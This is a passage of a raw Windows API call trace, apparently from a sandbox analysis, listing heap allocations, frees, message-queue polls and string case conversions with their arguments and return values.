hHeap=0x2af0000) returned 1 [0210.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0210.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0210.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0210.752] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0210.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf90 [0210.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73aa0 [0210.752] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0210.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.753] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0210.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0210.753] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0210.753] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0210.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73aa0 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0210.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0210.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0210.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0210.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0210.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0210.754] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0210.754] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0210.755] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0210.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab038 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74748 [0210.755] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0210.755] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0210.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0210.755] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0210.756] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0210.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0210.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0210.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0210.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.756] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74748 | out: hHeap=0x2af0000) returned 1 [0210.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.756] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0210.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0210.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0210.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0210.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0210.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0210.757] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0210.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab038 [0210.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.758] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.758] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0210.758] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.758] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9ba68 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0210.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0210.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0210.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0210.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0210.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.762] HeapFree (in: hHeap=0x2af0000, 